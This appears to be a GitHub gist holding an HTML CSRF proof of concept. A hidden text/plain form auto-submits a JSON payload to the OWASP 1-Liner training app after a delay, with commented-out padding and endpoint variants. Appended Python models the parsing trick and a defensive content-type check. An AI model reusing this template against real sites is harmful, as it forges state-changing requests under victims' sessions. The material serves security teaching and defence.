@jakekarnes42
Created August 7, 2019 23:19
CSRF PoC Example that can be reused. Automatically POSTs a JSON string to a server after a short delay.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function () {
  // Auto-submit the hidden form after a short delay (function form instead of eval'd string).
  setTimeout(function () { $('#target').submit(); }, 3000);
});</script>
</head>
<body>
<h1>Loading...</h1>
<!-- CSRF POST to /vulnerable using JSON commenting, works with Jackson that's used in OWASP 1-Liner -->
<form id="target" enctype="text/plain" method="POST" action="http://local.1-liner.org/oneliner/ws/vulnerable/oneliners" style="visibility:hidden">
<input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />
<input type="submit" value="Go" />
</form>
<!-- CSRF POST to /vulnerable using JSON padding, does not work with Jackson that's used in OWASP 1-Liner -->
<!--
<form id="target" enctype="text/plain" method="POST" action="http://local.1-liner.org/oneliner/ws/vulnerable/oneliners" style="visibility:hidden">
<input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006", "paddingDummy": "' value='"}' />
<input type="submit" value="Go" />
</form>
-->
<!-- CSRF POST to /securish -->
<!--
<form id="target" enctype="text/plain" method="POST" action="http://local.1-liner.org/oneliner/ws/securish/oneliners" style="visibility:hidden">
<input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />
<input type="submit" value="Go" />
</form>
-->
</body>
</html>
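The gist relies on two facts: a form with enctype="text/plain" sends its fields as raw "name=value" lines, and a JSON parser that tolerates // comments will discard the "=dummy" tail. The added Python below (not part of the gist or OWASP 1-Liner) models both behaviours and the server-side gate that defeats them: a media-type check, since an HTML form cannot send application/json, plus a strict parse. The lenient parser and the unknown-property rejection are toy models of Jackson behaviour, and the claim that the padding variant fails because of Jackson's default FAIL_ON_UNKNOWN_PROPERTIES is an assumption; the field names come from the form above.

```python
import json
import re

# Fields the gist's target endpoint binds (taken from the payload in the form above).
ONE_LINER_FIELDS = {"id", "nickName", "oneLiner", "timestamp"}


def text_plain_form_body(fields):
    """Encode fields the way a browser does for enctype="text/plain":
    one 'name=value' pair per line, CRLF-terminated, no escaping."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def lenient_parse(body):
    """Toy model of a parser that tolerates '//' line comments, which is how a
    Jackson reader with ALLOW_COMMENTS behaves. Not a Jackson port."""
    return json.loads(re.sub(r"//[^\r\n]*", "", body))


def bind_one_liner(obj):
    """Toy model of bean binding that rejects unknown properties (assumed to
    mirror Jackson's default FAIL_ON_UNKNOWN_PROPERTIES). Returns dict or None."""
    if not isinstance(obj, dict) or set(obj) - ONE_LINER_FIELDS:
        return None
    return obj


def is_acceptable_json_request(content_type, body):
    """Defender-side gate: require application/json (which an HTML form cannot
    send) and parse strictly, with no comment tolerance, before binding."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        return False
    try:
        json.loads(body)
    except ValueError:  # json.JSONDecodeError is a ValueError
        return False
    return True


# Constructed bodies mirroring the two form variants in the gist (fields trimmed).
COMMENT_BODY = text_plain_form_body([('{"id": 0, "nickName": "John"}//', "dummy")])
PADDING_BODY = text_plain_form_body([('{"id": 0, "nickName": "John", "paddingDummy": "', '"}')])

if __name__ == "__main__":
    print(lenient_parse(COMMENT_BODY))                 # comment variant parses to the intended object
    print(bind_one_liner(lenient_parse(PADDING_BODY))) # None: 'paddingDummy' is an unknown property
    print(is_acceptable_json_request("text/plain", COMMENT_BODY))  # False: wrong media type
```

Requiring application/json alone stops the form-based variants here; strict parsing (no comment tolerance) is the second layer for clients that can set arbitrary headers but are still subject to CORS preflight.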